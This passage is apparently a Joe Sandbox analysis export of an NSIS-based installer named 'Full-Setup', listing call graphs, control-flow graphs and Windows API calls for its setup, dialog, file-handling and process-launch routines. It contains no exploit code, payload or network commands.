3680->3682 3681->3682 3683 406359 3681->3683 3682->3683 3683->3677 3684 406ac5 lstrcpyW 3683->3684 3685 406b13 GetShortPathNameW 3684->3685 3686 406aea 3684->3686 3687 406b2c 3685->3687 3688 406c8e 3685->3688 3710 405e7c GetFileAttributesW CreateFileW 3686->3710 3687->3688 3691 406b34 WideCharToMultiByte 3687->3691 3688->3677 3690 406af3 CloseHandle GetShortPathNameW 3690->3688 3692 406b0b 3690->3692 3691->3688 3693 406b51 WideCharToMultiByte 3691->3693 3692->3685 3692->3688 3693->3688 3694 406b69 wsprintfA 3693->3694 3695 406831 18 API calls 3694->3695 3696 406b95 3695->3696 3711 405e7c GetFileAttributesW CreateFileW 3696->3711 3698 406ba2 3698->3688 3699 406baf GetFileSize GlobalAlloc 3698->3699 3700 406bd0 ReadFile 3699->3700 3701 406c84 CloseHandle 3699->3701 3700->3701 3702 406bea 3700->3702 3701->3688 3702->3701 3712 405de2 lstrlenA 3702->3712 3705 406c03 lstrcpyA 3708 406c25 3705->3708 3706 406c17 3707 405de2 4 API calls 3706->3707 3707->3708 3709 406c5c SetFilePointer WriteFile GlobalFree 3708->3709 3709->3701 3710->3690 3711->3698 3713 405e23 lstrlenA 3712->3713 3714 405e2b 3713->3714 3715 405dfc lstrcmpiA 3713->3715 3714->3705 3714->3706 3715->3714 3716 405e1a CharNextA 3715->3716 3716->3713 4865 402da5 4866 4030e3 4865->4866 4867 402dac 4865->4867 4868 401446 18 API calls 4867->4868 4869 402db8 4868->4869 4870 402dbf SetFilePointer 4869->4870 4870->4866 4871 402dcf 4870->4871 4871->4866 4873 405f7d wsprintfW 4871->4873 4873->4866 4874 4049a8 GetDlgItem GetDlgItem 4875 4049fe 7 API calls 4874->4875 4880 404c16 4874->4880 4876 404aa2 DeleteObject 4875->4876 4877 404a96 SendMessageW 4875->4877 4878 404aad 4876->4878 4877->4876 4881 404ae4 4878->4881 4884 406831 18 API calls 4878->4884 4879 404cfb 4882 404da0 4879->4882 4883 404c09 4879->4883 4888 404d4a SendMessageW 4879->4888 4880->4879 4892 40487a 5 API calls 4880->4892 4905 404c86 4880->4905 4887 403d6b 19 API calls 4881->4887 4885 404db5 4882->4885 4886 404da9 SendMessageW 4882->4886 4889 403df6 8 API calls 4883->4889 4890 404ac6 SendMessageW SendMessageW 4884->4890 4897 404dc7 ImageList_Destroy 4885->4897 4898 404dce 4885->4898 4903 404dde 4885->4903 4886->4885 4893 404af8 4887->4893 4888->4883 4895 404d5f SendMessageW 4888->4895 4896 404f97 4889->4896 4890->4878 4891 404ced SendMessageW 4891->4879 4892->4905 4899 403d6b 19 API calls 4893->4899 4894 404f48 4894->4883 4904 404f5d ShowWindow GetDlgItem ShowWindow 4894->4904 4900 404d72 4895->4900 4897->4898 4901 404dd7 GlobalFree 4898->4901 4898->4903 4907 404b09 4899->4907 4909 404d83 SendMessageW 4900->4909 4901->4903 4902 404bd6 GetWindowLongW SetWindowLongW 4906 404bf0 4902->4906 4903->4894 4908 40141d 80 API calls 4903->4908 4918 404e10 4903->4918 4904->4883 4905->4879 4905->4891 4910 404bf6 ShowWindow 4906->4910 4911 404c0e 4906->4911 4907->4902 4913 404b65 SendMessageW 4907->4913 4914 404bd0 4907->4914 4916 404b93 SendMessageW 4907->4916 4917 404ba7 SendMessageW 4907->4917 4908->4918 4909->4882 4925 403dc4 SendMessageW 4910->4925 4926 403dc4 SendMessageW 4911->4926 4913->4907 4914->4902 4914->4906 4916->4907 4917->4907 4919 404e54 4918->4919 4922 404e3e SendMessageW 4918->4922 4920 404f1f InvalidateRect 4919->4920 4924 404ecd SendMessageW SendMessageW 4919->4924 4920->4894 4921 404f35 4920->4921 4923 4043d9 21 API calls 4921->4923 4922->4919 4923->4894 4924->4919 4925->4883 4926->4880 4927 4030a9 SendMessageW 4928 4030c2 InvalidateRect 4927->4928 4929 4030e3 4927->4929 4928->4929 3891 4038af #17 SetErrorMode OleInitialize 3892 406328 3 API calls 3891->3892 3893 4038f2 SHGetFileInfoW 3892->3893 3965 406035 lstrcpynW 3893->3965 3895 40391d GetCommandLineW 3966 406035 lstrcpynW 3895->3966 3897 40392f GetModuleHandleW 3898 403947 3897->3898 3899 405d32 CharNextW 3898->3899 3900 403956 CharNextW 3899->3900 3911 403968 3900->3911 3901 403a02 3902 403a21 GetTempPathW 3901->3902 3967 4037f8 3902->3967 3904 403a37 3906 403a3b GetWindowsDirectoryW lstrcatW 3904->3906 3907 403a5f DeleteFileW 3904->3907 3905 405d32 CharNextW 3905->3911 3909 4037f8 11 API calls 3906->3909 3975 4035b3 GetTickCount GetModuleFileNameW 3907->3975 3912 403a57 3909->3912 3910 403a73 3913 403af8 3910->3913 3915 405d32 CharNextW 3910->3915 3951 403add 3910->3951 3911->3901 3911->3905 3918 403a04 3911->3918 3912->3907 3912->3913 4060 403885 3913->4060 3919 403a8a 3915->3919 4067 406035 lstrcpynW 3918->4067 3930 403b23 lstrcatW lstrcmpiW 3919->3930 3931 403ab5 3919->3931 3920 403aed 3923 406113 9 API calls 3920->3923 3921 403bfa 3924 403c7d 3921->3924 3926 406328 3 API calls 3921->3926 3922 403b0d 3925 405ccc MessageBoxIndirectW 3922->3925 3923->3913 3927 403b1b ExitProcess 3925->3927 3929 403c09 3926->3929 3933 406328 3 API calls 3929->3933 3930->3913 3932 403b3f CreateDirectoryW SetCurrentDirectoryW 3930->3932 4068 4067aa 3931->4068 3935 403b62 3932->3935 3936 403b57 3932->3936 3937 403c12 3933->3937 4085 406035 lstrcpynW 3935->4085 4084 406035 lstrcpynW 3936->4084 3941 406328 3 API calls 3937->3941 3944 403c1b 3941->3944 3943 403b70 4086 406035 lstrcpynW 3943->4086 3945 403c69 ExitWindowsEx 3944->3945 3950 403c29 GetCurrentProcess 3944->3950 3945->3924 3949 403c76 3945->3949 3946 403ad2 4083 406035 lstrcpynW 3946->4083 3952 40141d 80 API calls 3949->3952 3954 403c39 3950->3954 4003 405958 3951->4003 3952->3924 3953 406831 18 API calls 3955 403b98 DeleteFileW 3953->3955 3954->3945 3956 403ba5 CopyFileW 3955->3956 3962 403b7f 3955->3962 3956->3962 3957 403bee 3958 406c94 42 API calls 3957->3958 3960 403bf5 3958->3960 3959 406c94 42 API calls 3959->3962 3960->3913 3961 406831 18 API calls 3961->3962 3962->3953 3962->3957 3962->3959 3962->3961 3964 403bd9 CloseHandle 3962->3964 4087 405c6b CreateProcessW 3962->4087 3964->3962 3965->3895 3966->3897 3968 406064 5 API calls 3967->3968 3969 403804 3968->3969 3970 40380e 3969->3970 3971 40674e 3 API calls 3969->3971 3970->3904 3972 403816 CreateDirectoryW 3971->3972 3973 405eab 2 API calls 3972->3973 3974 40382a 3973->3974 3974->3904 4090 405e7c GetFileAttributesW CreateFileW 3975->4090 3977 4035f3 3997 403603 3977->3997 4091 406035 lstrcpynW 3977->4091 3979 403619 4092 40677d lstrlenW 3979->4092 3983 40362a GetFileSize 3984 403726 3983->3984 3998 403641 3983->3998 4097 4032d2 3984->4097 3986 40372f 3988 40376b GlobalAlloc 3986->3988 3986->3997 4109 403368 SetFilePointer 3986->4109 3987 403336 ReadFile 3987->3998 4108 403368 SetFilePointer 3988->4108 3991 4037e9 3994 4032d2 6 API calls 3991->3994 3992 403786 3995 40337f 33 API calls 3992->3995 3993 40374c 3996 403336 ReadFile 3993->3996 3994->3997 4001 403792 3995->4001 4000 403757 3996->4000 3997->3910 3998->3984 3998->3987 3998->3991 3998->3997 3999 4032d2 6 API calls 3998->3999 3999->3998 4000->3988 4000->3997 4001->3997 4001->4001 4002 4037c0 SetFilePointer 4001->4002 4002->3997 4004 406328 3 API calls 4003->4004 4005 40596c 4004->4005 4006 405972 4005->4006 4007 405984 4005->4007 4123 405f7d wsprintfW 4006->4123 4008 405eff 3 API calls 4007->4008 4009 4059b5 4008->4009 4011 4059d4 lstrcatW 4009->4011 4013 405eff 3 API calls 4009->4013 4012 405982 4011->4012 4114 403ec1 4012->4114 4013->4011 4016 4067aa 18 API calls 4017 405a06 4016->4017 4018 405a9c 4017->4018 4020 405eff 3 API calls 4017->4020 4019 4067aa 18 API calls 4018->4019 4021 405aa2 4019->4021 4022 405a38 4020->4022 4023 405ab2 4021->4023 4024 406831 18 API calls 4021->4024 4022->4018 4026 405a5b lstrlenW 4022->4026 4029 405d32 CharNextW 4022->4029 4025 405ad2 LoadImageW 4023->4025 4125 403ea0 4023->4125 4024->4023 4027 405b92 4025->4027 4028 405afd RegisterClassW 4025->4028 4030 405a69 lstrcmpiW 4026->4030 4031 405a8f 4026->4031 4035 40141d 80 API calls 4027->4035 4033 405b9c 4028->4033 4034 405b45 SystemParametersInfoW CreateWindowExW 4028->4034 4036 405a56 4029->4036 4030->4031 4037 405a79 GetFileAttributesW 4030->4037 4039 40674e 3 API calls 4031->4039 4033->3920 4034->4027 4040 405b98 4035->4040 4036->4026 4041 405a85 4037->4041 4038 405ac8 4038->4025 4042 405a95 4039->4042 4040->4033 4043 403ec1 19 API calls 4040->4043 4041->4031 4044 40677d 2 API calls 4041->4044 4124 406035 lstrcpynW 4042->4124 4046 405ba9 4043->4046 4044->4031 4047 405bb5 ShowWindow LoadLibraryW 4046->4047 4048 405c38 4046->4048 4049 405bd4 LoadLibraryW 4047->4049 4050 405bdb GetClassInfoW 4047->4050 4051 405073 83 API calls 4048->4051 4049->4050 4052 405c05 DialogBoxParamW 4050->4052 4053 405bef GetClassInfoW RegisterClassW 4050->4053 4054 405c3e 4051->4054 4057 40141d 80 API calls 4052->4057 4053->4052 4055 405c42 4054->4055 4056 405c5a 4054->4056 4055->4033 4059 40141d 80 API calls 4055->4059 4058 40141d 80 API calls 4056->4058 4057->4033 4058->4033 4059->4033 4061 40389d 4060->4061 4062 40388f CloseHandle 4060->4062 4132 403caf 4061->4132 4062->4061 4067->3902 4185 406035 lstrcpynW 4068->4185 4070 4067bb 4071 405d85 4 API calls 4070->4071 4072 4067c1 4071->4072 4073 406064 5 API calls 4072->4073 4080 403ac3 4072->4080 4076 4067d1 4073->4076 4074 406809 lstrlenW 4075 406810 4074->4075 4074->4076 4078 40674e 3 API calls 4075->4078 4076->4074 4077 406301 2 API calls 4076->4077 4076->4080 4081 40677d 2 API calls 4076->4081 4077->4076 4079 406816 GetFileAttributesW 4078->4079 4079->4080 4080->3913 4082 406035 lstrcpynW 4080->4082 4081->4074 4082->3946 4083->3951 4084->3935 4085->3943 4086->3962 4088 405ca6 4087->4088 4089 405c9a CloseHandle 4087->4089 4088->3962 4089->4088 4090->3977 4091->3979 4093 40678c 4092->4093 4094 406792 CharPrevW 4093->4094 4095 40361f 4093->4095 4094->4093 4094->4095 4096 406035 lstrcpynW 4095->4096 4096->3983 4098 4032f3 4097->4098 4099 4032db 4097->4099 4102 403303 GetTickCount 4098->4102 4103 4032fb 4098->4103 4100 4032e4 DestroyWindow 4099->4100 4101 4032eb 4099->4101 4100->4101 4101->3986 4105 403311 CreateDialogParamW ShowWindow 4102->4105 4106 403334 4102->4106 4110 40635e 4103->4110 4105->4106 4106->3986 4108->3992 4109->3993 4111 40637b PeekMessageW 4110->4111 4112 406371 DispatchMessageW 4111->4112 4113 403301 4111->4113 4112->4111 4113->3986 4115 403ed5 4114->4115 4130 405f7d wsprintfW 4115->4130 4117 403f49 4118 406831 18 API calls 4117->4118 4119 403f55 SetWindowTextW 4118->4119 4120 403f70 4119->4120 4121 403f8b 4120->4121 4122 406831 18 API calls 4120->4122 4121->4016 4122->4120 4123->4012 4124->4018 4131 406035 lstrcpynW 4125->4131 4127 403eb4 4128 40674e 3 API calls 4127->4128 4129 403eba lstrcatW 4128->4129 4129->4038 4130->4117 4131->4127 4133 403cbd 4132->4133 4134 4038a2 4133->4134 4135 403cc2 FreeLibrary GlobalFree 4133->4135 4136 406cc7 4134->4136 4135->4134 4135->4135 4137 4067aa 18 API calls 4136->4137 4138 406cda 4137->4138 4139 406ce3 DeleteFileW 4138->4139 4140 406cfa 4138->4140 4179 4038ae CoUninitialize 4139->4179 4141 406e77 4140->4141 4183 406035 lstrcpynW 4140->4183 4147 406301 2 API calls 4141->4147 4167 406e84 4141->4167 4141->4179 4143 406d25 4144 406d39 4143->4144 4145 406d2f lstrcatW 4143->4145 4148 40677d 2 API calls 4144->4148 4146 406d3f 4145->4146 4150 406d4f lstrcatW 4146->4150 4152 406d57 lstrlenW FindFirstFileW 4146->4152 4149 406e90 4147->4149 4148->4146 4153 40674e 3 API calls 4149->4153 4149->4179 4150->4152 4151 4062cf 11 API calls 4151->4179 4156 406e67 4152->4156 4180 406d7e 4152->4180 4154 406e9a 4153->4154 4157 4062cf 11 API calls 4154->4157 4155 405d32 CharNextW 4155->4180 4156->4141 4158 406ea5 4157->4158 4159 405e5c 2 API calls 4158->4159 4160 406ead RemoveDirectoryW 4159->4160 4164 406ef0 4160->4164 4165 406eb9 4160->4165 4161 406e44 FindNextFileW 4163 406e5c FindClose 4161->4163 4161->4180 4163->4156 4166 404f9e 25 API calls 4164->4166 4165->4167 4168 406ebf 4165->4168 4166->4179 4167->4151 4170 4062cf 11 API calls 4168->4170 4169 4062cf 11 API calls 4169->4180 4171 406ec9 4170->4171 4174 404f9e 25 API calls 4171->4174 4172 406cc7 72 API calls 4172->4180 4173 405e5c 2 API calls 4175 406dfa DeleteFileW 4173->4175 4176 406ed3 4174->4176 4175->4180 4177 406c94 42 API calls 4176->4177 4177->4179 4178 404f9e 25 API calls 4178->4161 4179->3921 4179->3922 4180->4155 4180->4161 4180->4169 4180->4172 4180->4173 4180->4178 4181 404f9e 25 API calls 4180->4181 4182 406c94 42 API calls 4180->4182 4184 406035 lstrcpynW 4180->4184 4181->4180 4182->4180 4183->4143 4184->4180 4185->4070 4930 401cb2 4931 40145c 18 API calls 4930->4931 4932 401c54 4931->4932 4933 4062cf 11 API calls 4932->4933 4934 401c64 4932->4934 4935 401c59 4933->4935 4936 406cc7 81 API calls 4935->4936 4936->4934 3717 4021b5 3718 40145c 18 API calls 3717->3718 3719 4021bb 3718->3719 3720 40145c 18 API calls 3719->3720 3721 4021c4 3720->3721 3722 40145c 18 API calls 3721->3722 3723 4021cd 3722->3723 3724 40145c 18 API calls 3723->3724 3725 4021d6 3724->3725 3726 404f9e 25 API calls 3725->3726 3727 4021e2 ShellExecuteW 3726->3727 3728 40221b 3727->3728 3729 40220d 3727->3729 3730 4062cf 11 API calls 3728->3730 3731 4062cf 11 API calls 3729->3731 3732 402230 3730->3732 3731->3728 4937 402238 4938 40145c 18 API calls 4937->4938 4939 40223e 4938->4939 4940 4062cf 11 API calls 4939->4940 4941 40224b 4940->4941 4942 404f9e 25 API calls 4941->4942 4943 402255 4942->4943 4944 405c6b 2 API calls 4943->4944 4945 40225b 4944->4945 4946 4062cf 11 API calls 4945->4946 4954 4022ac CloseHandle 4945->4954 4951 40226d 4946->4951 4948 4030e3 4949 402283 WaitForSingleObject 4950 402291 GetExitCodeProcess 4949->4950 4949->4951 4953 4022a3 4950->4953 4950->4954 4951->4949 4952 40635e 2 API calls 4951->4952 4951->4954 4952->4949 4956 405f7d wsprintfW 4953->4956 4954->4948 4956->4954 4957 404039 4958 404096 4957->4958 4959 404046 lstrcpynA lstrlenA 4957->4959 4959->4958 4960 404077 4959->4960 4960->4958 4961 404083 GlobalFree 4960->4961 4961->4958 4962 401eb9 4963 401f24 4962->4963 4966 401ec6 4962->4966 4964 401f53 GlobalAlloc 4963->4964 4968 401f28 4963->4968 4970 406831 18 API calls 4964->4970 4965 401ed5 4969 4062cf 11 API calls 4965->4969 4966->4965 4972 401ef7 4966->4972 4967 401f36 4986 406035 lstrcpynW 4967->4986 4968->4967 4971 4062cf 11 API calls 4968->4971 4981 401ee2 4969->4981 4974 401f46 4970->4974 4971->4967 4984 406035 lstrcpynW 4972->4984 4976 402708 4974->4976 4977 402387 GlobalFree 4974->4977 4977->4976 4978 401f06 4985 406035 lstrcpynW 4978->4985 4979 406831 18 API calls 4979->4981 4981->4976 4981->4979 4982 401f15 4987 406035 lstrcpynW 4982->4987 4984->4978 4985->4982 4986->4974 4987->4976

                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                          • Executed
                                                                                                                                                                          • Not Executed
                                                                                                                                                                          control_flow_graph 0 4050f9-405114 1 4052c1-4052c8 0->1 2 40511a-405201 GetDlgItem * 3 call 403dc4 call 4044a2 call 406831 call 4062cf GetClientRect GetSystemMetrics SendMessageW * 2 0->2 3 4052f2-4052ff 1->3 4 4052ca-4052ec GetDlgItem CreateThread CloseHandle 1->4 35 405203-40521d SendMessageW * 2 2->35 36 40521f-405222 2->36 6 405320-405327 3->6 7 405301-40530a 3->7 4->3 11 405329-40532f 6->11 12 40537e-405382 6->12 9 405342-40534b call 403df6 7->9 10 40530c-40531b ShowWindow * 2 call 403dc4 7->10 22 405350-405354 9->22 10->6 16 405331-40533d call 403d44 11->16 17 405357-405367 ShowWindow 11->17 12->9 14 405384-405387 12->14 14->9 20 405389-40539c SendMessageW 14->20 16->9 23 405377-405379 call 403d44 17->23 24 405369-405372 call 404f9e 17->24 29 4053a2-4053c3 CreatePopupMenu call 406831 AppendMenuW 20->29 30 4052ba-4052bc 20->30 23->12 24->23 37 4053c5-4053d6 GetWindowRect 29->37 38 4053d8-4053de 29->38 30->22 35->36 39 405232-405249 call 403d6b 36->39 40 405224-405230 SendMessageW 36->40 41 4053df-4053f7 TrackPopupMenu 37->41 38->41 46 40524b-40525f ShowWindow 39->46 47 40527f-4052a0 GetDlgItem SendMessageW 39->47 40->39 41->30 43 4053fd-405414 41->43 45 405419-405434 SendMessageW 43->45 45->45 48 405436-405459 OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 45->48 49 405261-40526c ShowWindow 46->49 50 40526e 46->50 47->30 51 4052a2-4052b8 SendMessageW * 2 47->51 52 40545b-405484 SendMessageW 48->52 54 405274-40527a call 403dc4 49->54 50->54 51->30 52->52 53 405486-4054a0 GlobalUnlock SetClipboardData CloseClipboard 52->53 53->30 54->47
                                                                                                                                                                          APIs
                                                                                                                                                                          • GetDlgItem.USER32(?,00000403), ref: 0040515B
                                                                                                                                                                          • GetDlgItem.USER32(?,000003EE), ref: 0040516A
                                                                                                                                                                          • GetClientRect.USER32(?,?), ref: 004051C2
                                                                                                                                                                          • GetSystemMetrics.USER32(00000015), ref: 004051CA
                                                                                                                                                                          • SendMessageW.USER32(?,00001061,00000000,00000002), ref: 004051EB
                                                                                                                                                                          • SendMessageW.USER32(?,00001036,00004000,00004000), ref: 004051FC
                                                                                                                                                                          • SendMessageW.USER32(?,00001001,00000000,00000110), ref: 0040520F
                                                                                                                                                                          • SendMessageW.USER32(?,00001026,00000000,00000110), ref: 0040521D
                                                                                                                                                                          • SendMessageW.USER32(?,00001024,00000000,?), ref: 00405230
                                                                                                                                                                          • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 00405252
                                                                                                                                                                          • ShowWindow.USER32(?,00000008), ref: 00405266
                                                                                                                                                                          • GetDlgItem.USER32(?,000003EC), ref: 00405287
                                                                                                                                                                          • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 00405297
                                                                                                                                                                          • SendMessageW.USER32(00000000,00000409,00000000,?), ref: 004052AC
                                                                                                                                                                          • SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 004052B8
                                                                                                                                                                          • GetDlgItem.USER32(?,000003F8), ref: 00405179
                                                                                                                                                                            • Part of subcall function 00403DC4: SendMessageW.USER32(00000028,?,00000001,004057E0), ref: 00403DD2
                                                                                                                                                                            • Part of subcall function 00406831: GetVersion.KERNEL32(00445D80,?,00000000,00404FD5,00445D80,00000000,00427773,74DF23A0,00000000), ref: 00406902
                                                                                                                                                                            • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                                                                                                            • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                                                                                                          • GetDlgItem.USER32(?,000003EC), ref: 004052D7
                                                                                                                                                                          • CreateThread.KERNELBASE(00000000,00000000,Function_00005073,00000000), ref: 004052E5
                                                                                                                                                                          • CloseHandle.KERNELBASE(00000000), ref: 004052EC
                                                                                                                                                                          • ShowWindow.USER32(00000000), ref: 00405313
                                                                                                                                                                          • ShowWindow.USER32(?,00000008), ref: 00405318
                                                                                                                                                                          • ShowWindow.USER32(00000008), ref: 0040535F
                                                                                                                                                                          • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405391
                                                                                                                                                                          • CreatePopupMenu.USER32 ref: 004053A2
                                                                                                                                                                          • AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 004053B7
                                                                                                                                                                          • GetWindowRect.USER32(?,?), ref: 004053CA
                                                                                                                                                                          • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 004053EC
                                                                                                                                                                          • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405427
                                                                                                                                                                          • OpenClipboard.USER32(00000000), ref: 00405437
                                                                                                                                                                          • EmptyClipboard.USER32 ref: 0040543D
                                                                                                                                                                          • GlobalAlloc.KERNEL32(00000042,00000000,?,?,00000000,?,00000000), ref: 00405449
                                                                                                                                                                          • GlobalLock.KERNEL32(00000000), ref: 00405453
                                                                                                                                                                          • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405467
                                                                                                                                                                          • GlobalUnlock.KERNEL32(00000000), ref: 00405489
                                                                                                                                                                          • SetClipboardData.USER32(0000000D,00000000), ref: 00405494
                                                                                                                                                                          • CloseClipboard.USER32 ref: 0040549A
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1805525423.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1805503772.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1805550479.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1805570909.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1805570909.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1805570909.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1805570909.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1805683696.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_Full-Setup.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlockVersionlstrlenwvsprintf
                                                                                                                                                                          • String ID: New install of "%s" to "%s"${
                                                                                                                                                                          • API String ID: 2110491804-1641061399
                                                                                                                                                                          • Opcode ID: 27dd6abe78b25364254968db719b86f88dfe8c12dd5559a56974b496927f2e5b
                                                                                                                                                                          • Instruction ID: db3ff0878cedf1d1b3e6f9985675ba3e3c8e3ad145c0decdf5c07b0ce3ef5d1a
                                                                                                                                                                          • Opcode Fuzzy Hash: 27dd6abe78b25364254968db719b86f88dfe8c12dd5559a56974b496927f2e5b
                                                                                                                                                                          • Instruction Fuzzy Hash: 46B15970900609BFEB11AFA1DD89EAE7B79FB04354F00803AFA05BA1A1C7755E81DF58

                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                          • Executed
                                                                                                                                                                          • Not Executed
                                                                                                                                                                          control_flow_graph 202 4038af-403945 #17 SetErrorMode OleInitialize call 406328 SHGetFileInfoW call 406035 GetCommandLineW call 406035 GetModuleHandleW 209 403947-40394a 202->209 210 40394f-403963 call 405d32 CharNextW 202->210 209->210 213 4039f6-4039fc 210->213 214 403a02 213->214 215 403968-40396e 213->215 216 403a21-403a39 GetTempPathW call 4037f8 214->216 217 403970-403976 215->217 218 403978-40397c 215->218 228 403a3b-403a59 GetWindowsDirectoryW lstrcatW call 4037f8 216->228 229 403a5f-403a79 DeleteFileW call 4035b3 216->229 217->217 217->218 219 403984-403988 218->219 220 40397e-403983 218->220 222 4039e4-4039f1 call 405d32 219->222 223 40398a-403991 219->223 220->219 222->213 237 4039f3 222->237 226 403993-40399a 223->226 227 4039a6-4039b8 call 40382c 223->227 232 4039a1 226->232 233 40399c-40399f 226->233 242 4039ba-4039c1 227->242 243 4039cd-4039e2 call 40382c 227->243 228->229 240 403af8-403b07 call 403885 CoUninitialize 228->240 229->240 241 403a7b-403a81 229->241 232->227 233->227 233->232 237->213 257 403bfa-403c00 240->257 258 403b0d-403b1d call 405ccc ExitProcess 240->258 244 403ae1-403ae8 call 405958 241->244 245 403a83-403a8c call 405d32 241->245 247 4039c3-4039c6 242->247 248 4039c8 242->248 243->222 254 403a04-403a1c call 40824c call 406035 243->254 256 403aed-403af3 call 406113 244->256 260 403aa5-403aa7 245->260 247->243 247->248 248->243 254->216 256->240 262 403c02-403c1f call 406328 * 3 257->262 263 403c7d-403c85 257->263 267 403aa9-403ab3 260->267 268 403a8e-403aa0 call 40382c 260->268 293 403c21-403c23 262->293 294 403c69-403c74 ExitWindowsEx 262->294 269 403c87 263->269 270 403c8b 263->270 275 403b23-403b3d lstrcatW lstrcmpiW 267->275 276 403ab5-403ac5 call 4067aa 267->276 268->267 283 403aa2 268->283 269->270 275->240 277 403b3f-403b55 CreateDirectoryW SetCurrentDirectoryW 275->277 276->240 286 403ac7-403add call 406035 * 2 276->286 281 403b62-403b82 call 406035 * 2 277->281 282 403b57-403b5d call 406035 277->282 303 403b87-403ba3 call 406831 DeleteFileW 281->303 282->281 283->260 286->244 293->294 297 403c25-403c27 293->297 294->263 300 403c76-403c78 call 40141d 294->300 297->294 301 403c29-403c3b GetCurrentProcess 297->301 300->263 301->294 308 403c3d-403c5f 301->308 309 403be4-403bec 303->309 310 403ba5-403bb5 CopyFileW 303->310 308->294 309->303 311 403bee-403bf5 call 406c94 309->311 310->309 312 403bb7-403bd7 call 406c94 call 406831 call 405c6b 310->312 311->240 312->309 322 403bd9-403be0 CloseHandle 312->322 322->309
                                                                                                                                                                          APIs
                                                                                                                                                                          • #17.COMCTL32 ref: 004038CE
                                                                                                                                                                          • SetErrorMode.KERNELBASE(00008001), ref: 004038D9
                                                                                                                                                                          • OleInitialize.OLE32(00000000), ref: 004038E0
                                                                                                                                                                            • Part of subcall function 00406328: GetModuleHandleA.KERNEL32(?,?,00000020,004038F2,00000008), ref: 00406336
                                                                                                                                                                            • Part of subcall function 00406328: LoadLibraryA.KERNELBASE(?,?,?,00000020,004038F2,00000008), ref: 00406341
                                                                                                                                                                            • Part of subcall function 00406328: GetProcAddress.KERNEL32(00000000), ref: 00406353
                                                                                                                                                                          • SHGetFileInfoW.SHELL32(0040A264,00000000,?,000002B4,00000000), ref: 00403908
                                                                                                                                                                            • Part of subcall function 00406035: lstrcpynW.KERNEL32(?,?,00002004,0040391D,00476AA0,NSIS Error), ref: 00406042
                                                                                                                                                                          • GetCommandLineW.KERNEL32(00476AA0,NSIS Error), ref: 0040391D
                                                                                                                                                                          • GetModuleHandleW.KERNEL32(00000000,004CF0A0,00000000), ref: 00403930
                                                                                                                                                                          • CharNextW.USER32(00000000,004CF0A0,00000020), ref: 00403957
                                                                                                                                                                          • GetTempPathW.KERNEL32(00002004,004E30C8,00000000,00000020), ref: 00403A2C
                                                                                                                                                                          • GetWindowsDirectoryW.KERNEL32(004E30C8,00001FFF), ref: 00403A41
                                                                                                                                                                          • lstrcatW.KERNEL32(004E30C8,\Temp), ref: 00403A4D
                                                                                                                                                                          • DeleteFileW.KERNELBASE(004DF0C0), ref: 00403A64
                                                                                                                                                                          • CoUninitialize.COMBASE(?), ref: 00403AFD
                                                                                                                                                                          • ExitProcess.KERNEL32 ref: 00403B1D
                                                                                                                                                                          • lstrcatW.KERNEL32(004E30C8,~nsu.tmp), ref: 00403B29
                                                                                                                                                                          • lstrcmpiW.KERNEL32(004E30C8,004DB0B8,004E30C8,~nsu.tmp), ref: 00403B35
                                                                                                                                                                          • CreateDirectoryW.KERNEL32(004E30C8,00000000), ref: 00403B41
                                                                                                                                                                          • SetCurrentDirectoryW.KERNEL32(004E30C8), ref: 00403B48
                                                                                                                                                                          • DeleteFileW.KERNEL32(0043DD40,0043DD40,?,00483008,0040A204,0047F000,?), ref: 00403B99
                                                                                                                                                                          • CopyFileW.KERNEL32(004EB0D8,0043DD40,00000001), ref: 00403BAD
                                                                                                                                                                          • CloseHandle.KERNEL32(00000000,0043DD40,0043DD40,?,0043DD40,00000000), ref: 00403BDA
                                                                                                                                                                          • GetCurrentProcess.KERNEL32(00000028,00000005,00000005,00000004,00000003), ref: 00403C30
                                                                                                                                                                          • ExitWindowsEx.USER32(00000002,00000000), ref: 00403C6C
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1805525423.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1805503772.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1805550479.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1805570909.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
